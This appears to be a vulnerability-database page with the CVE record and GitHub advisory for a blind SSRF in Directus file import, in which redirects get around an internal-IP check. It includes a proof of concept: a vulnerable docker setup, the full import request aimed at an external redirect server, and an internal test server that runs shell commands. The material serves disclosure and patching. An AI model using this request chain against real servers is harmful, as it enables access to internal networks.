cve-2024-39699
Vulnerability from cvelistv5
Published
2024-07-08 15:32
Modified
2024-08-02 04:26
Severity ?
EPSS score ?
Summary
Directus is a real-time API and App dashboard for managing SQL database content. There was already a reported SSRF vulnerability via file import. It was fixed by resolving all DNS names and checking if the requested IP is an internal IP address. However it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1. However, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal. This vulnerability is fixed in 10.9.3.
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:monospace:directus:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "directus",
"vendor": "monospace",
"versions": [
{
"lessThan": "10.9.3",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-39699",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-08T18:12:46.359227Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-08T18:13:58.460Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:26:15.949Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/directus/directus/security/advisories/GHSA-8p72-rcq4-h6pw",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/directus/directus/security/advisories/GHSA-8p72-rcq4-h6pw"
},
{
"name": "https://github.com/directus/directus/commit/d577b44231c0923aca99cac5770fd853801caee1",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/directus/directus/commit/d577b44231c0923aca99cac5770fd853801caee1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "directus",
"vendor": "directus",
"versions": [
{
"status": "affected",
"version": "\u003c 10.9.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Directus is a real-time API and App dashboard for managing SQL database content. There was already a reported SSRF vulnerability via file import. It was fixed by resolving all DNS names and checking if the requested IP is an internal IP address. However it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1. However, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal. This vulnerability is fixed in 10.9.3."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-08T15:32:04.556Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/directus/directus/security/advisories/GHSA-8p72-rcq4-h6pw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/directus/directus/security/advisories/GHSA-8p72-rcq4-h6pw"
},
{
"name": "https://github.com/directus/directus/commit/d577b44231c0923aca99cac5770fd853801caee1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/directus/directus/commit/d577b44231c0923aca99cac5770fd853801caee1"
}
],
"source": {
"advisory": "GHSA-8p72-rcq4-h6pw",
"discovery": "UNKNOWN"
},
"title": "Directus has a Blind SSRF On File Import"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-39699",
"datePublished": "2024-07-08T15:32:04.556Z",
"dateReserved": "2024-06-27T18:44:13.038Z",
"dateUpdated": "2024-08-02T04:26:15.949Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-39699\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-07-08T16:15:08.917\",\"lastModified\":\"2024-11-21T09:28:14.827\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Directus is a real-time API and App dashboard for managing SQL database content. There was already a reported SSRF vulnerability via file import. It was fixed by resolving all DNS names and checking if the requested IP is an internal IP address. However it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1. However, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal. This vulnerability is fixed in 10.9.3.\"},{\"lang\":\"es\",\"value\":\"Directus es una API y un panel de aplicaciones en tiempo real para administrar el contenido de la base de datos SQL. Ya se inform\u00f3 de una vulnerabilidad SSRF mediante la importaci\u00f3n de archivos. Se solucion\u00f3 resolviendo todos los nombres DNS y verificando si la IP solicitada es una direcci\u00f3n IP interna. Sin embargo, es posible saltarse esta medida de seguridad y ejecutar un SSRF mediante redireccionamientos. Directus permite redireccionamientos al importar archivos desde la URL y no verifica la URL del resultado. As\u00ed, es posible ejecutar una solicitud a una IP interna, por ejemplo a 127.0.0.1. Sin embargo, es SSRF ciego, porque Directus tambi\u00e9n utiliza la t\u00e9cnica de interceptaci\u00f3n de respuestas para obtener la informaci\u00f3n sobre la conexi\u00f3n desde el socket directamente y no muestra una respuesta si la direcci\u00f3n IP es interna. Esta vulnerabilidad se solucion\u00f3 en 10.9.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\",\"baseScore\":5.0,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.1,\"impactScore\":1.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\",\"baseScore\":5.0,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.1,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:monospace:directus:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"10.9.3\",\"matchCriteriaId\":\"C7EF259E-D347-4839-8415-71B2588FD7DE\"}]}]}],\"references\":[{\"url\":\"https://github.com/directus/directus/commit/d577b44231c0923aca99cac5770fd853801caee1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/directus/directus/security/advisories/GHSA-8p72-rcq4-h6pw\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/directus/directus/commit/d577b44231c0923aca99cac5770fd853801caee1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/directus/directus/security/advisories/GHSA-8p72-rcq4-h6pw\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
}
}
ghsa-8p72-rcq4-h6pw
Vulnerability from github
Published
2024-07-08 15:25
Modified
2024-07-08 19:06
Severity ?
5.0 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
5.3 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
5.3 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
Summary
Directus Blind SSRF On File Import
Details
Summary
There was already a reported SSRF vulnerability via file import. https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h It was fixed by resolving all DNS names and checking if the requested IP is an internal IP address.
However it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1.
However, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal (nice fix, by the way :) ).
But the blindness does not fully mitigate the impact of the vulnerability. The blind SSRF is still exploitable in the real life scenarios, because there could be a vulnerable software inside of the network which can be exploited with GET request. I will show the example in the PoC. Also, you can check HackTricks page with some known cases.
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
PoC
For testing I used the docker compose with the latest directus version. Here is my docker compose file
version: "3"
services:
directus:
image: directus/directus:10.8.3
ports:
- 8055:8055
volumes:
- ./database:/directus/database
- ./uploads:/directus/uploads
- ./extensions:/directus/extensions
environment:
KEY: "redacted"
SECRET: "redacted"
ADMIN_EMAIL: "admin@example.com"
ADMIN_PASSWORD: "redacted"
DB_CLIENT: "sqlite3"
DB_FILENAME: "/directus/database/data.db"
As a first step it is needed to setup a redirect server which will redirect the incoming request to some internal URL. I did it on my VPS with the public IP.
After it I setup a simple HTTP Server emulating the vulnerable application inside the internal network. It just execute any shell command provided in the cmd GET-parameter.
After it the directus import functionality was used
It initiates the following HTTP request
``` POST /files/import HTTP/1.1 Host: 127.0.0.1:8055 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Authorization: Bearer redacteed Content-Type: application/json Content-Length: 44 Origin: http://127.0.0.1:8055 Connection: close Referer: http://127.0.0.1:8055/admin/files/+ Cookie: directus_refresh_token=redacted Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
{"url":"http://94.103.84.233:801","data":{}} ```
It can be seen on the redirect server that the request came to it.
And we can also see the request in the localhost server (the same host as directus), which confirms the bypass and the SSRF.
And the rce_poc file was created.
Impact
The impact is Blind SSRF. Using it an attacker can initiate HTTP GET requests to the internal network. For example, it can be used to exploit some GET-based vulnerabilities of other software in the internal network.
Fix proposition
I think there are two ways to fix this vulnerability:
- Disallow redirects for the import requests
- Check the Location header in the import request response if it is present. Drop the request if the Location url points to the internal IP.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@directus/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "17.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-39699"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-08T15:25:50Z",
"nvd_published_at": "2024-07-08T16:15:08Z",
"severity": "MODERATE"
},
"details": "### Summary\nThere was already a reported SSRF vulnerability via file import. [https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h](https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h)\nIt was fixed by resolving all DNS names and checking if the requested IP is an internal IP address. \n\nHowever it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1.\n\nHowever, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal (nice fix, by the way :) ).\n\nBut the blindness does not fully mitigate the impact of the vulnerability. The blind SSRF is still exploitable in the real life scenarios, because there could be a vulnerable software inside of the network which can be exploited with GET request. I will show the example in the PoC. Also, you can check [HackTricks](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms) page with some known cases. \n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nFor testing I used the docker compose with the latest directus version. Here is my docker compose file\n```\nversion: \"3\"\nservices:\n directus:\n image: directus/directus:10.8.3\n ports:\n - 8055:8055\n volumes:\n - ./database:/directus/database\n - ./uploads:/directus/uploads\n - ./extensions:/directus/extensions\n environment:\n KEY: \"redacted\"\n SECRET: \"redacted\"\n ADMIN_EMAIL: \"admin@example.com\"\n ADMIN_PASSWORD: \"redacted\"\n DB_CLIENT: \"sqlite3\"\n DB_FILENAME: \"/directus/database/data.db\"\n```\n\nAs a first step it is needed to setup a redirect server which will redirect the incoming request to some internal URL. I did it on my VPS with the public IP.\n\n\u003cimg width=\"1035\" alt=\"image\" src=\"https://user-images.githubusercontent.com/156416961/296198555-870898b2-7b8a-4857-a8fe-5e28e85241b0.png\"\u003e\n\nAfter it I setup a simple HTTP Server emulating the vulnerable application inside the internal network. It just execute any shell command provided in the cmd GET-parameter.\n\n\u003cimg width=\"454\" alt=\"image\" src=\"https://user-images.githubusercontent.com/156416961/296198963-4465fa15-c6d6-4e8c-92a0-a2ae334ba79f.png\"\u003e\n\nAfter it the directus import functionality was used \n\n\u003cimg width=\"930\" alt=\"image\" src=\"https://user-images.githubusercontent.com/156416961/296199457-d5d8eb2d-1ca8-442e-b1bf-15ddb0f1947d.png\"\u003e\n\nIt initiates the following HTTP request\n\n```\nPOST /files/import HTTP/1.1\nHost: 127.0.0.1:8055\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nAuthorization: Bearer redacteed\nContent-Type: application/json\nContent-Length: 44\nOrigin: http://127.0.0.1:8055\nConnection: close\nReferer: http://127.0.0.1:8055/admin/files/+\nCookie: directus_refresh_token=redacted\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"url\":\"http://94.103.84.233:801\",\"data\":{}}\n```\n\nIt can be seen on the redirect server that the request came to it.\n\n\n\nAnd we can also see the request in the localhost server (the same host as directus), which confirms the bypass and the SSRF.\n\n\n\u003cimg width=\"437\" alt=\"image\" src=\"https://user-images.githubusercontent.com/156416961/296201651-a9b61f5d-0ccd-4e3e-b137-e82fda8f5347.png\"\u003e\n\nAnd the rce_poc file was created. \n\n\u003cimg width=\"538\" alt=\"image\" src=\"https://user-images.githubusercontent.com/156416961/296201869-fed5fa94-ece5-497d-a091-c422b1f540a0.png\"\u003e\n\n\n\n\n### Impact\nThe impact is Blind SSRF. Using it an attacker can initiate HTTP GET requests to the internal network. For example, it can be used to exploit some GET-based vulnerabilities of other software in the internal network.\n\n### Fix proposition\n\nI think there are two ways to fix this vulnerability:\n\n- Disallow redirects for the import requests\n- Check the Location header in the import request response if it is present. Drop the request if the Location url points to the internal IP.\n",
"id": "GHSA-8p72-rcq4-h6pw",
"modified": "2024-07-08T19:06:20Z",
"published": "2024-07-08T15:25:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/directus/directus/security/advisories/GHSA-8p72-rcq4-h6pw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39699"
},
{
"type": "WEB",
"url": "https://github.com/directus/directus/commit/d577b44231c0923aca99cac5770fd853801caee1"
},
{
"type": "PACKAGE",
"url": "https://github.com/directus/directus"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Directus Blind SSRF On File Import"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.